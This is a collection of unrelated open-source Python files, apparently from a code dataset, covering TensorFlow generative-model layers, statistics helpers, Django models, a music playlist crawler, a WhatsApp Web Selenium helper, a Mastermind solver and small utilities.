pearsonlab/tf_gbds
| 0
|
12784793
|
"""
The MIT License (MIT)
Copyright (c) 2017 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy as np
import tensorflow as tf
from tensorflow.contrib.keras import backend
from tensorflow.contrib.keras import layers as keras_layers
class DLGMLayer(keras_layers.Layer):
"""
This layer is inspired by the paper "Stochastic Backpropagation and
Approximate Inference in Deep Generative Models"
incoming (Keras layer): preceding layer in DLGM
num_units (int): number of output units in this layer
rec_nets (dictionary of Keras networks): neural networks that
parameterize the recognition model
postJ (tensor): input to the recognition model (passed to calculate_xi)
k (float): regularization term on generative weights
"""
def __init__(self, incoming, num_units, rec_nets, k,
output_layer=False, extra_noise=0.01,
param_init=tf.random_normal_initializer(0, 0.01),
nonlinearity=tf.nn.relu,
**kwargs):
super(DLGMLayer, self).__init__(**kwargs)
num_inputs = incoming.output_shape[1]
self.num_units = num_units
self.output_layer = output_layer
self.extra_noise = extra_noise
# Initialize generative/decoding Parameters
self.W = self.add_variable(name='W', shape=(num_inputs, num_units),
initializer=param_init)
self.b = self.add_variable(name='b', shape=(num_units,),
initializer=param_init)
self.unc_G = self.add_variable(name='unc_G',
shape=(num_units, num_units),
initializer=param_init)
self.G = (tf.diag(tf.nn.softplus(tf.diag_part(self.unc_G))) +
self.unc_G - tf.matrix_band_part(self.unc_G, 0, -1))
self.nonlinearity = nonlinearity
# regularization term
self.k = k
# Load recognition/encoding Parameters
self.mu_net = rec_nets['mu_net']
self.u_net = rec_nets['u_net']
self.unc_d_net = rec_nets['unc_d_net']
def build(self, incoming, postJ):
rec_params = (self.mu_net.variables +
self.u_net.variables +
self.unc_d_net.variables)
i = 0
for param in rec_params:
self.add_variable(name="param"+str(i), shape=None,
initializer=param)
i += 1
super(DLGMLayer, self).build(incoming)
def calculate_xi(self, postJ):
"""
Calculate xi based on sampled J from posterior
"""
# get output of rec model
self.batch_mu = self.mu_net(postJ)
self.batch_u = self.u_net(postJ)
self.batch_unc_d = self.unc_d_net(postJ)
# add extra dim to batch_u, so it gets treated as column vectors when
# iterated over
self.batch_u = tf.expand_dims(self.batch_u, -1)
def get_cov(acc, inputs):
# convert output of rec model to rank-1 covariance matrix
# use softplus to get positive constrained d, minimum of -15
# since softplus will turn low numbers into 0, which become NaNs
# when inverted
u, unc_d = inputs
d = tf.nn.softplus(tf.maximum(unc_d, -15.0))
D_inv = tf.diag(1.0 / d)
eta = 1.0 / (tf.matmul(tf.matmul(tf.transpose(u), D_inv), u) + 1.0)
C = D_inv - eta*tf.matmul(tf.matmul(tf.matmul(D_inv, u),
tf.transpose(u)), D_inv)
Tr_C = tf.trace(C)
ld_C = tf.log(eta) - tf.reduce_sum(tf.log(d)) # eq 20 in DLGM
# coeff = ((1 - T.sqrt(eta)) / (u.T.dot(D_inv).dot(u)))
# simplified coefficient below is more stable as u -> 0
# original coefficient from paper is above
coeff = eta / (1.0 + tf.sqrt(eta))
R = (tf.sqrt(D_inv) - coeff * tf.matmul
(tf.matmul(tf.matmul(D_inv, u), tf.transpose(u)),
tf.sqrt(D_inv)))
return Tr_C, ld_C, R
(self.batch_Tr_C, self.batch_ld_C, self.batch_R) = tf.scan(
get_cov, [self.batch_u, self.batch_unc_d],
initializer=(0.0, tf.zeros([1, 1]), tf.diag(self.batch_unc_d[0])))
self.batch_xi = (self.batch_mu +
(tf.squeeze(tf.matmul(self.batch_R,
(tf.expand_dims(tf.random_normal(
[tf.shape(self.batch_R)[0],
self.num_units]), -1))))))
def call(self, inputs, add_noise=False, use_rec_model=False):
activation = tf.matmul(self.nonlinearity(inputs), self.W) + self.b
if use_rec_model:
# use sample from rec model
xi = self.batch_xi
if add_noise: # additional noise
xi += (self.extra_noise * tf.random_normal
(tf.shape(self.batch_xi)))
else:
# pure random input
xi = tf.random_normal((tf.shape(inputs)[0], self.num_units))
# we want the mean when training, so don't add noise to
# output of last layer when training.
if not self.output_layer:
activation += tf.matmul(xi, self.G)
elif not add_noise:
activation += tf.matmul(xi, self.G)
return activation
def get_ELBO(self, length):
"""
Get ELBO for this layer
length (int tensor): length of current batch
"""
# KL divergence between posterior and N(0,1) prior
KL_div = (0.5 * (tf.reduce_sum(tf.sqrt(tf.reduce_sum(self.batch_mu**2,
axis=1))) + tf.reduce_sum(self.batch_Tr_C) -
tf.reduce_sum(self.batch_ld_C) - length))
weight_reg = ((0.5 / self.k) *
tf.sqrt(tf.reduce_sum(self.W**2)) *
tf.sqrt(tf.reduce_sum(self.G**2)))
return -(weight_reg + KL_div)
def compute_output_shape(self, input_shape):
return (input_shape[0], self.num_units)
class PKBiasLayer(keras_layers.Layer):
"""
This layer draws different biases (depending on the mode)
from a normal distribution, then adds them to the input
Default modes are as follows:
0: normal, no biases added
1: saline and DLPFC, bias 0 is added
2: saline and DMPFC, bias 1 is added
3: muscimol and DLPFC, biases 0 and 2 are added
4: muscimol and DMPFC, biases 1 and 3 are added
"""
def __init__(self, incoming, params,
param_init=tf.random_normal_initializer(stddev=0.01),
num_biases=4, **kwargs):
super(PKBiasLayer, self).__init__(**kwargs)
num_inputs = incoming.output_shape[1]
self.mode = tf.zeros(num_biases)
self.k = np.cast[backend.floatx()](params['k'])
self.m = self.add_variable(name='m', shape=[num_biases, num_inputs],
initializer=param_init)
self.log_s = self.add_variable(name='log_s',
shape=[num_biases, num_inputs],
initializer=param_init)
# standard deviation will always be positive but optimization over
# log_s can be unconstrained
self.s = tf.exp(self.log_s)
self.draw_biases()
self.draw_on_every_output = True
def build(self, incoming):
if self.draw_on_every_output:
self.draw_biases()
super(PKBiasLayer, self).build(incoming)
def draw_biases(self):
self.biases = self.m + tf.random_normal(shape=self.s.shape,
seed=1234) * self.s
def call(self, inputs):
act_biases = tf.matmul(tf.reshape(tf.cast(
self.mode, backend.floatx()), [1, -1]), self.biases)
return inputs + act_biases
def set_mode(self, mode):
self.mode = mode
def get_ELBO(self, nbatches):
"""
Return the contribution to the ELBO for these biases
Normalized by nbatches (number of batches in dataset)
"""
ELBO = (tf.reduce_sum(-tf.abs(self.biases) / self.k -
tf.log(tf.constant(2.0) * self.k)))
ELBO += tf.reduce_sum(tf.log(self.s))
return ELBO / nbatches
class PKRowBiasLayer(keras_layers.Layer):
"""
This layer draws different biases (depending on the mode)
from a normal distribution, then adds them to the input.
This layer has sparsity at the row level, instead of the individual
sparsity of the PKBiasLayer.
Default modes are as follows:
0: normal, no biases added
1: saline and DLPFC, bias 0 is added
2: saline and DMPFC, bias 1 is added
3: muscimol and DLPFC, biases 0 and 2 are added
4: muscimol and DMPFC, biases 1 and 3 are added
"""
def __init__(self, incoming, params,
param_init=tf.random_normal_initializer(stddev=0.01),
num_biases=4, **kwargs):
super(PKRowBiasLayer, self).__init__(**kwargs)
num_inputs = incoming.output_shape[1]
self.mode = tf.zeros(num_biases)
# parameters on prior
self.a = np.cast[backend.floatx()](params['a']) # shape
self.b = np.cast[backend.floatx()](params['b']) # rate
# learnable posterior parameters
# normal dist over biases
self.mu = self.add_variable(name='mu', shape=[num_biases, num_inputs],
initializer=param_init)
self.unc_sig = self.add_variable(name='unc_sig',
shape=[num_biases, num_inputs],
initializer=param_init)
# gamma over rows
self.alpha = tf.Variable(initial_value=self.a * np.ones(
(num_biases, 1)), name='alpha', dtype=tf.float32)
self.beta = tf.Variable(initial_value=self.b * np.ones(
(num_biases, 1)), name='beta', dtype=tf.float32)
# update for alpha
self.alpha += (num_inputs / 2.0)
# standard deviation will always be positive but optimization over
# unc_sig can be unconstrained
self.sigma = tf.nn.softplus(self.unc_sig)
self.draw_biases()
self.draw_on_every_output = True
def build(self, incoming):
if self.draw_on_every_output:
self.draw_biases()
super(PKRowBiasLayer, self).build(incoming)
def draw_biases(self):
self.gamma = self.mu + tf.random_normal(
shape=self.sigma.shape, seed=1234) * self.sigma
def call(self, input):
act_biases = tf.matmul(tf.reshape(tf.cast(
self.mode, backend.floatx()), [1, -1]), self.gamma)
return input + act_biases
def set_mode(self, mode):
self.mode = mode
def coord_update(self):
self.beta = self.b + 0.5 * tf.reduce_sum(self.mu**2 + self.sigma**2,
axis=1,
keep_dims=True)
def get_ELBO(self, nbatches):
"""
Return the contribution to the ELBO for these biases
Normalized by nbatches (number of batches in dataset)
"""
self.coord_update()
# Log Density
ELBO = (tf.reduce_sum(-0.5 * (self.mu**2 + self.sigma**2) *
(self.alpha / self.beta) + 0.5 * (tf.digamma(self.alpha) -
tf.log(self.beta)) - 0.5 * tf.log(2 * np.pi)))
ELBO += (tf.reduce_sum((self.a - 1) * (tf.digamma(self.alpha) -
tf.log(self.beta)) - self.b * (self.alpha / self.beta) +
self.a * tf.log(self.b) - tf.lgamma(self.a)))
# entropy
ELBO += (tf.reduce_sum(0.5 * tf.log(2 * np.pi) + 0.5 +
tf.log(self.sigma)))
ELBO += (tf.reduce_sum(self.alpha - tf.log(self.beta) +
tf.lgamma(self.alpha) + (1 - self.alpha) *
tf.digamma(self.alpha)))
return ELBO / nbatches
| 1.898438
| 2
|
vendor/mo_math/stats.py
|
klahnakoski/auth0-api
| 0
|
12784794
|
# encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Author: <NAME> (<EMAIL>)
#
from __future__ import absolute_import, division, unicode_literals
import math
import sys
from math import sqrt
from mo_dots import Data, Null, coalesce
from mo_future import text
from mo_logs import Log
from mo_math import OR, almost_equal
from mo_math.vendor import strangman
DEBUG = True
DEBUG_STRANGMAN = False
EPSILON = 0.000000001
ABS_EPSILON = sys.float_info.min * 2 # *2 FOR SAFETY
if DEBUG_STRANGMAN:
try:
import numpy as np
from scipy import stats
import scipy
except Exception as e:
DEBUG_STRANGMAN = False
def chisquare(f_obs, f_exp):
try:
py_result = strangman.stats.chisquare(f_obs, f_exp)
except Exception as e:
Log.error("problem with call", e)
if DEBUG_STRANGMAN:
from mo_testing.fuzzytestcase import assertAlmostEqualValue
sp_result = scipy.stats.chisquare(np.array(f_obs), f_exp=np.array(f_exp))
if not assertAlmostEqualValue(
sp_result[0], py_result[0], digits=9
) and assertAlmostEqualValue(sp_result[1], py_result[1], delta=1e-8):
Log.error("problem with stats lib")
return py_result
def Stats2ZeroMoment(stats):
# MODIFIED FROM http://statsmodels.sourceforge.net/devel/_modules/statsmodels/stats/moment_helpers.html
# ADDED count
mc0, mc1, mc2, skew, kurt = (
stats.count,
coalesce(stats.mean, 0),
coalesce(stats.variance, 0),
coalesce(stats.skew, 0),
coalesce(stats.kurtosis, 0),
)
mz0 = mc0
mz1 = mc1 * mc0
mz2 = (mc2 + mc1 * mc1) * mc0
mc3 = coalesce(skew, 0) * (mc2 ** 1.5) # 3rd central moment
mz3 = (mc3 + 3 * mc1 * mc2 + mc1 ** 3) * mc0 # 3rd non-central moment
mc4 = (coalesce(kurt, 0) + 3.0) * (mc2 ** 2.0) # 4th central moment
mz4 = (mc4 + 4 * mc1 * mc3 + 6 * mc1 * mc1 * mc2 + mc1 ** 4) * mc0
m = ZeroMoment(mz0, mz1, mz2, mz3, mz4)
if DEBUG:
from mo_testing.fuzzytestcase import assertAlmostEqualValue
globals()["DEBUG"] = False
try:
v = ZeroMoment2Stats(m)
assertAlmostEqualValue(v.count, stats.count, places=10)
assertAlmostEqualValue(v.mean, stats.mean, places=10)
assertAlmostEqualValue(v.variance, stats.variance, places=10)
assertAlmostEqualValue(v.skew, stats.skew, places=10)
assertAlmostEqualValue(v.kurtosis, stats.kurtosis, places=10)
except Exception as e:
v = ZeroMoment2Stats(m)
Log.error("programmer error")
globals()["DEBUG"] = True
return m
def ZeroMoment2Stats(z_moment):
Z = z_moment.S
N = Z[0]
if N == 0:
return Stats()
mean = Z[1] / N
Z2 = Z[2] / N
Z3 = Z[3] / N
Z4 = Z[4] / N
if N == 1:
variance = None
skew = None
kurtosis = None
else:
if almost_equal(Z2, mean * mean, digits=9):
variance = 0
skew = None
kurtosis = None
else:
variance = Z2 - mean * mean
mc3 = Z3 - (3 * mean * variance + mean ** 3) # 3rd central moment
mc4 = Z4 - (4 * mean * mc3 + 6 * mean * mean * variance + mean ** 4)
skew = mc3 / (variance ** 1.5)
kurtosis = (mc4 / (variance ** 2.0)) - 3.0
stats = Stats(count=N, mean=mean, variance=variance, skew=skew, kurtosis=kurtosis)
if DEBUG:
from mo_testing.fuzzytestcase import assertAlmostEqualValue
globals()["DEBUG"] = False
v = Null
try:
v = Stats2ZeroMoment(stats)
for i in range(5):
assertAlmostEqualValue(v.S[i], Z[i], places=7)
except Exception as e:
Log.error(
"Conversion failed. Programmer error:\nfrom={{from|indent}},\nresult stats={{stats|indent}},\nexpected param={{expected|indent}}",
{"from": Z},
stats=stats,
expected=v.S,
cause=e,
)
globals()["DEBUG"] = True
return stats
class Stats(Data):
def __init__(self, **kwargs):
Data.__init__(self)
self.count = 0
self.mean = None
self.variance = None
self.skew = None
self.kurtosis = None
if "samples" in kwargs:
s = ZeroMoment2Stats(ZeroMoment.new_instance(kwargs["samples"]))
self.count = s.count
self.mean = s.mean
self.variance = s.variance
self.skew = s.skew
self.kurtosis = s.kurtosis
return
if "count" not in kwargs:
self.count = 0
self.mean = None
self.variance = None
self.skew = None
self.kurtosis = None
elif "mean" not in kwargs:
self.count = kwargs["count"]
self.mean = None
self.variance = None
self.skew = None
self.kurtosis = None
elif "variance" not in kwargs and "std" not in kwargs:
self.count = kwargs["count"]
self.mean = kwargs["mean"]
self.variance = 0
self.skew = None
self.kurtosis = None
elif "skew" not in kwargs:
self.count = kwargs["count"]
self.mean = kwargs["mean"]
self.variance = (
kwargs["variance"] if "variance" in kwargs else kwargs["std"] ** 2
)
self.skew = None
self.kurtosis = None
elif "kurtosis" not in kwargs:
self.count = kwargs["count"]
self.mean = kwargs["mean"]
self.variance = (
kwargs["variance"] if "variance" in kwargs else kwargs["std"] ** 2
)
self.skew = kwargs["skew"]
self.kurtosis = None
else:
self.count = kwargs["count"]
self.mean = kwargs["mean"]
self.variance = (
kwargs["variance"] if "variance" in kwargs else kwargs["std"] ** 2
)
self.skew = kwargs["skew"]
self.kurtosis = kwargs["kurtosis"]
@property
def std(self):
return sqrt(self.variance)
class ZeroMoment(object):
"""
ZERO-CENTERED MOMENTS
"""
def __init__(self, *args):
self.S = tuple(args)
def __add__(self, other):
if isinstance(other, ZeroMoment):
return ZeroMoment(*map(add, self.S, other.S))
elif hasattr(other, "__iter__"):
return ZeroMoment(*map(add, self.S, ZeroMoment.new_instance(other)))
elif other == None:
return self
else:
return ZeroMoment(
*map(
add,
self.S,
(
1,
other,
pow(other, 2),
pow(other, 3),
pow(other, 4),
),
)
)
def __sub__(self, other):
if isinstance(other, ZeroMoment):
return ZeroMoment(*map(sub, self.S, other.S))
elif hasattr(other, "__iter__"):
return ZeroMoment(*map(sub, self.S, ZeroMoment.new_instance(other)))
elif other == None:
return self
else:
return ZeroMoment(
*map(
sub, self.S, (1, other, pow(other, 2), pow(other, 3), pow(other, 4))
)
)
@property
def tuple(self):
# RETURN AS ORDERED TUPLE
return self.S
@property
def dict(self):
# RETURN HASH OF SUMS
return {"s" + text(i): m for i, m in enumerate(self.S)}
@staticmethod
def new_instance(values=None):
if values == None:
return ZeroMoment()
vals = [v for v in values if v != None]
return ZeroMoment(
len(vals),
sum(vals),
sum([pow(n, 2) for n in vals]),
sum([pow(n, 3) for n in vals]),
sum([pow(n, 4) for n in vals]),
)
@property
def stats(self, *args, **kwargs):
return ZeroMoment2Stats(self, *args, **kwargs)
def add(a, b):
return coalesce(a, 0) + coalesce(b, 0)
def sub(a, b):
return coalesce(a, 0) - coalesce(b, 0)
def ZeroMoment2dict(z):
# RETURN HASH OF SUMS
return {"s" + text(i): m for i, m in enumerate(z.S)}
def median(values, simple=True, mean_weight=0.0):
"""
RETURN MEDIAN VALUE
IF simple=False THEN IN THE EVENT MULTIPLE INSTANCES OF THE
MEDIAN VALUE, THE MEDIAN IS INTERPOLATED BASED ON ITS POSITION
IN THE MEDIAN RANGE
mean_weight IS TO PICK A MEDIAN VALUE IN THE ODD CASE THAT IS
CLOSER TO THE MEAN (PICK A MEDIAN BETWEEN TWO MODES IN BIMODAL CASE)
"""
if OR(v == None for v in values):
Log.error("median is not ready to handle None")
try:
if not values:
return Null
l = len(values)
_sorted = sorted(values)
middle = int(l / 2)
_median = float(_sorted[middle])
if len(_sorted) == 1:
return _median
if simple:
if l % 2 == 0:
return (_sorted[middle - 1] + _median) / 2
return _median
# FIND RANGE OF THE median
start_index = middle - 1
while start_index > 0 and _sorted[start_index] == _median:
start_index -= 1
start_index += 1
stop_index = middle + 1
while stop_index < l and _sorted[stop_index] == _median:
stop_index += 1
num_middle = stop_index - start_index
if l % 2 == 0:
if num_middle == 1:
return (_sorted[middle - 1] + _median) / 2
else:
return (_median - 0.5) + (middle - start_index) / num_middle
else:
if num_middle == 1:
return (1 - mean_weight) * _median + mean_weight * (
_sorted[middle - 1] + _sorted[middle + 1]
) / 2
else:
return (_median - 0.5) + (middle + 0.5 - start_index) / num_middle
except Exception as e:
Log.error("problem with median of {{values}}", values=values, cause=e)
def percentile(values, percent):
"""
PERCENTILE WITH INTERPOLATION
RETURN VALUE AT, OR ABOVE, percentile OF THE VALUES
snagged from http://code.activestate.com/recipes/511478-finding-the-percentile-of-the-values/
"""
N = sorted(values)
if not N:
return None
k = (len(N) - 1) * percent
f = int(math.floor(k))
c = int(math.ceil(k))
if f == c:
return N[int(k)]
d0 = N[f] * (c - k)
d1 = N[c] * (k - f)
return d0 + d1
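# Illustrative value (not part of the original module): percent is a fraction in [0, 1],
# so percentile([1, 2, 3, 4], 0.5) interpolates to 2.5.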
zero = Stats()
| 1.984375
| 2
|
et_micc2/static_vars.py
|
etijskens/et-micc2
| 0
|
12784795
|
# -*- coding: utf-8 -*-
"""
Module et_micc2.static_vars
===========================
A decorator for adding static variables to a function.
see https://stackoverflow.com/questions/279561/what-is-the-python-equivalent-of-static-variables-inside-a-function
"""
def static_vars(**kwargs):
"""Add static variables to a method.
To add the variable :py:obj:`counter` to :py:meth:`foo` :
.. code-block:: python
@static_vars(counter=0)
def foo():
foo.counter += 1 # foo.counter is incremented on every call to foo
"""
def decorate(func):
for k in kwargs:
setattr(func, k, kwargs[k])
return func
return decorate
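# A small self-check (not part of the original module) mirroring the docstring example:
if __name__ == "__main__":
    @static_vars(counter=0)
    def foo():
        foo.counter += 1
        return foo.counter

    print(foo(), foo(), foo())  # expected output: 1 2 3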
#eof
| 3.609375
| 4
|
django_project/polls/models.py
|
Jeffhabs/cs2450
| 0
|
12784796
|
<filename>django_project/polls/models.py
import uuid
from django.db import models
from django.contrib.auth.models import User
class Question(models.Model):
user = models.ForeignKey(User)
question_text = models.CharField(max_length=128)
pub_date = models.DateTimeField(auto_now_add=True)
private = models.BooleanField(default=False)
active = models.BooleanField(default=False)
uuid = models.UUIDField(default=uuid.uuid4, editable=False)
@property
def get_uuid(self):
return unicode(self.uuid)
def __unicode__(self, *args, **kwargs):
return self.question_text
class Choice(models.Model):
question = models.ForeignKey(Question)
choice_text = models.CharField(max_length=128)
votes = models.PositiveIntegerField(default=0)
def __unicode__(self, *args, **kwargs):
return self.question.question_text + " - " + self.choice_text
| 2.5
| 2
|
src/music_crawler.py
|
AlexanderTankov/Music-player
| 0
|
12784797
|
<gh_stars>0
from mutagen.mp3 import MP3
import pygame
from song import Song
from playlist import Playlist
import os
NUM = 0
PATH_TO_MUSIC_LIB = "/home/alexandar/Documents/Programming-101/Week2/Music Library"
class MusicCrawler():
def __init__(self, path):
self.path = path
def generate_playlist(self):
result = Playlist("Rock'n'roll")
music_files = [f for f in os.listdir(self.path) if f.endswith('.mp3') or f.endswith('.MP3')]
for song in music_files:
audio = MP3(self.path + "/" + song)
my_new_song = Song(audio["TIT2"],
audio["TPE1"],
audio["TALB"],
0,
int(audio.info.length),
audio.info.bitrate
)
result.add_song(my_new_song)
return result
def start_playlist(array_of_songs, num):
pygame.mixer.init()
pygame.mixer.music.load(array_of_songs[num - 1])
pygame.mixer.music.play()
def stop():
pygame.mixer.music.stop()
def startProgramNoRepeat():
global NUM
NUM += 1
crawler = MusicCrawler(PATH_TO_MUSIC_LIB)
playlist = crawler.generate_playlist()
songs_arr = []
for elem in playlist.songs:
songs_arr.append("{} - {}.mp3".format(elem.artist, elem.title))
if NUM > len(songs_arr):
NUM = len(songs_arr)
start_playlist(songs_arr, NUM)
def startProgram():
print("startProgram")
global NUM
NUM += 1
crawler = MusicCrawler(PATH_TO_MUSIC_LIB)
playlist = crawler.generate_playlist()
songs_arr = []
for elem in playlist.songs:
songs_arr.append("{} - {}.mp3".format(elem.artist, elem.title))
print("Playlist:")
for idx, elem in enumerate(songs_arr):
print("[{}] {}".format(idx + 1, elem))
if NUM > len(songs_arr):
NUM = 1
start_playlist(songs_arr, NUM)
| 3.078125
| 3
|
data/datasplit.py
|
hktxt/CBI
| 1
|
12784798
|
# organize data, read wav to get duration and split train/test
# to a csv file
# author: Max, 2020.08.05
import os
import librosa
from tqdm import tqdm
import pandas as pd
from sklearn.model_selection import StratifiedKFold
def main(root_pth):
if not os.path.exists('df.csv'):
data = []
folds = os.listdir(root_pth)
for idx, fold in enumerate(tqdm(folds)):
wavs = os.listdir(os.path.join(root_pth, fold))
for wav in wavs:
wav_pth = os.path.join(root_pth, fold, wav)
duration = librosa.get_duration(filename=wav_pth)
target = {
'file': wav,
'bird': fold,
'label': idx,
'duration': duration
}
data.append(target)
# if idx == 1:
# break
df = pd.DataFrame(data, columns=['label', 'bird', 'file', 'duration'])
df.to_csv('df.csv', index=False)
df = pd.read_csv('df.csv')
df['fold'] = -1
skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=42)
for fold_number, (train_index, val_index) in enumerate(skf.split(X=df.index, y=df['label'])):
df.loc[df.iloc[val_index].index, 'fold'] = fold_number
df.to_csv('df.csv', index=False)
if __name__ == "__main__":
# main('./data/birdsong-recognition/train_audio/')
# https://www.kaggle.com/ttahara/training-birdsong-baseline-resnest50-fast#split-data
skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=42)
train_all = pd.read_csv('train_mod.csv')
train_all = train_all.drop(train_all[train_all["resampled_filename"] == 'XC195038.wav'].index)
train_all = train_all.reset_index()
train_all["fold"] = -1
for fold_id, (train_index, val_index) in enumerate(skf.split(train_all, train_all["ebird_code"])):
train_all.iloc[val_index, -1] = fold_id
# # check the propotion
fold_proportion = pd.pivot_table(train_all, index="ebird_code", columns="fold", values="xc_id", aggfunc=len)
print(fold_proportion.shape)
train_all.to_csv('df_mod.csv', index=False)
| 2.984375
| 3
|
pictures/models.py
|
Waithera-m/collage_life
| 0
|
12784799
|
from django.db import models
# Create your models here.
class Location(models.Model):
"""
class facilitates the creation of location objects
"""
location_name = models.CharField(max_length=70)
def __str__(self):
return self.location_name
def save_location(self):
"""
method saves entered location in database
"""
self.save()
def update_location(self, using=None, fields=None, **kwargs):
"""
method updates saved location
"""
if fields is not None:
fields = set(fields)
deferred_fields = self.get_deferred_fields()
if fields.intersection(deferred_fields):
fields = fields.union(deferred_fields)
super().refresh_from_db(using, fields, **kwargs)
def delete_location(self):
"""
method deletes location
"""
self.delete()
class Category(models.Model):
"""
class facilitates the creation of category objects
"""
category_name = models.CharField(max_length=70)
def __str__(self):
return self.category_name
def save_category(self):
"""
method saves added category
"""
self.save()
def update_category(self, using=None, fields=None, **kwargs):
"""
method updates saved category
"""
if fields is not None:
fields = set(fields)
deferred_fields = self.get_deferred_fields()
if fields.intersection(deferred_fields):
fields = fields.union(deferred_fields)
super().refresh_from_db(using, fields, **kwargs)
def delete_category(self):
"""
method deletes saved category
"""
self.delete()
class Image(models.Model):
"""
class facilitates the creation of image objects
"""
image_name = models.CharField(max_length=70)
image_description = models.TextField(max_length=200)
location = models.ForeignKey(Location, on_delete=models.CASCADE)
category = models.ManyToManyField(Category)
pub_date = models.DateField('date published', null=True)
owner = models.CharField(max_length=70, null=True)
image = models.ImageField(upload_to='images/%Y/%m/%d', null=True)
def __str__(self):
return self.image_name
def save_image(self):
"""
method saves added image
"""
self.save()
def update_image(self, using=None, fields=None, **kwargs):
"""
method updates saved image
"""
if fields is not None:
fields = set(fields)
deferred_fields = self.get_deferred_fields()
if fields.intersection(deferred_fields):
fields = fields.union(deferred_fields)
super().refresh_from_db(using, fields, **kwargs)
def delete_image(self):
"""
method deletes saved image
"""
self.delete()
@classmethod
def get_image_by_id(cls, image_id):
"""
method returns image with a particular id
"""
try:
single_image = cls.objects.filter(pk=image_id)
except Image.DoesNotExist:
pass
return single_image
@classmethod
def filter_images_by_location(cls, location_id):
"""
method returns images taken at a given location
"""
try:
images = cls.objects.filter(location__pk=location_id)
except Image.DoesNotExist:
pass
return images
@classmethod
def search_images_by_category(cls, category_id):
"""
method returns images associated with a particular category
"""
try:
images = cls.objects.filter(category__pk=category_id)
except Image.DoesNotExist:
pass
return images
@classmethod
def search_term_category(cls, search_term):
"""
method returns category specific images
"""
images = cls.objects.filter(category__category_name__icontains=search_term)
return images
| 2.84375
| 3
|
pybot/whatsapp/feature/WelcomePageFeature.py
|
iren86/whatsapp-pybot
| 4
|
12784800
|
<reponame>iren86/whatsapp-pybot<filename>pybot/whatsapp/feature/WelcomePageFeature.py
# -*- coding: utf-8 -*-
from functools import partial
from selenium.webdriver.common.by import By
from pybot.whatsapp.feature.BaseFeature import BaseFeature
from pybot.whatsapp.util import WaitUtil
WAIT_FOR_QR_CODE_TIMEOUT_IN_SEC = 600
class WelcomePageFeature(BaseFeature):
SCAN_IMAGE = (
By.XPATH,
'//img[contains(@alt, "Scan me")]'
)
def open_welcome_page(self):
self.driver.get("https://web.whatsapp.com/")
def wait_for_phone_scan_complete(self):
WaitUtil.wait_for_result_is_false(partial(self.is_element_exists, WelcomePageFeature.SCAN_IMAGE),
WAIT_FOR_QR_CODE_TIMEOUT_IN_SEC,
"!!! Scan the QR code that appears on the Chrome browser screen with WhatsApp app on your phone. Waiting ....")
self.random_sleep_between_requests()
| 2.828125
| 3
|
excel_text/__init__.py
|
AutoActuary/excel-text
| 0
|
12784801
|
from excel_text.factory import get_text_function
text = get_text_function({"decimal": ".", "thousands": ",", "raise": True})
| 2.03125
| 2
|
lib/python/mastermind/algorithms/simple.py
|
JBierenbroodspot/mastermind
| 1
|
12784802
|
<gh_stars>1-10
# ----------------------------------------------------------------------------------------------------------------------
# SPDX-License-Identifier: BSD 3-Clause -
# Copyright (c) 2022 <NAME>. -
# ----------------------------------------------------------------------------------------------------------------------
"""
Mastermind solving algorithm using <NAME>'s and <NAME>'s simple algorithm.
This code is developed using code found in the following book:
<NAME>., & <NAME>. (1994). The art of Prolog: advanced programming techniques (2nd ed.). MIT Press.
"""
from __future__ import annotations
import typing
import lib.python.mastermind.mastermind as game
import initialization as init
def main() -> None:
game_simulation: typing.Generator[typing.Tuple[int, int, bool], game.Code, None]
guess: game.Code
answer: typing.Tuple[int, int, bool]
game_round: int = 0
possible_combinations: init.Json = init.get_combinations()
game_simulation = game.simulate_game(init.COLOURS, init.GAME_LENGTH, init.GAME_WIDTH)
for _ in game_simulation:
game_round += 1
guess = possible_combinations[0]
answer = game_simulation.send(guess)
print(f"Guessed: {guess}; answer: {answer}")
# Check if the game is won
if answer[2]:
print(f'Game won in {game_round} guesses!')
break
possible_combinations = init.reduce(possible_combinations, guess, answer[:2])
else:
print('Game lost.')
if __name__ == "__main__":
main()
| 3.78125
| 4
|
iceworm/tests/plugins/env.py
|
wrmsr0/iceworm
| 0
|
12784803
|
import os
import typing as ta
from omnibus import lang
from ._registry import register
@lang.cached_nullary
def _load_dot_env() -> ta.Optional[ta.Mapping[str, str]]:
fp = os.path.join(os.path.dirname(os.path.dirname(__file__)), '../../.env')
if not os.path.isfile(fp):
return None
with open(fp, 'r') as f:
buf = f.read()
ret = {}
for line in buf.splitlines():
line = line.strip()
if not line or line.startswith('#'):
continue
k, _, v = line.partition('=')
k = k.strip()
v = v.strip()
ret[k] = v
os.environ[k] = v
return ret
@register
class EnvPlugin:
def pytest_addoption(self, parser):
parser.addoption('--no-dotenv', action='store_true', help='Disables dotenv')
def pytest_configure(self, config):
if not config.option.no_dotenv:
_load_dot_env()
| 1.976563
| 2
|
client_linux/helpers/aesthetics.py
|
carlosgprado/BrundleFuzz
| 90
|
12784804
|
##################################################################
# Aesthetics.py
# It is not only pretty but legible too
##################################################################
try:
import colorama
from colorama import Fore, Back, Style
COLORAMA = True
except ImportError:
print "[!] COLORAMA not found"
print "Defaulting to boring text..."
COLORAMA = False
class Aesthetics(object):
def __init__(self, parent):
"""
NOTE: This could be implemented
as decorators...
"""
self.parent = parent
if COLORAMA:
colorama.init(autoreset = True)
def m_info(self, m):
m = '[*] ' + m
if COLORAMA:
print Style.DIM + m
else:
print m
